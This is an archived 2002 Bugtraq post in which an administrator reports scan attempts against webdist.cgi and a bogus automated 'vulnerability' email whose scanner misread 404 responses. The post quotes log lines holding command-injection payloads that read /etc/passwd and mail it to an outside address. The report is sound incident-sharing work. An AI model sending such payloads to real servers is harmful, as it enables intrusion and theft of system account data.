|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: zeno (bugtraq_at_cgisecurity.net)
Date: Fri Sep 06 2002 - 10:03:47 CDT
I got the following scans in my logs yesterday.
68.46.64.23 - - [05/Sep/2002:17:37:37 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-"
68.46.64.23 - - [05/Sep/2002:17:44:13 -0400] "GET /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[vuln
threezee.com] HTTP/1.0" 404 2656 "-" "-"
68.46.64.23 - - [05/Sep/2002:17:49:22 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-"
Now I got the following email today.
> This is an automated message:
>
> This system was scanned by GoogleMaker 1.0, and is found to have a
> vulnurability. Please contact a system administrator.
>
> Vulnurability: Vulnerability in webdist.cgi
> Information: http://www.cert.org/advisories/CA-1997-12.html
>
>
> URGENT - URGENT - URGENT
>
> Thank you,
> TZSecurity.
>
>
What is funny about this is that I do not run this software and they are reporting I do.
Seems this persons scanner can't figure out what 404 codes mean. I am reporting this mostly
for the fact that if they are reporting false information to me they are probably doing so
to others and people should be aware.
Visiting the site I see that it is webattack.com editor's pick. Tip for webattack not to pick
sites who can't tell the difference between 404 and 200.
Regards,
- zenocgisecurity.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]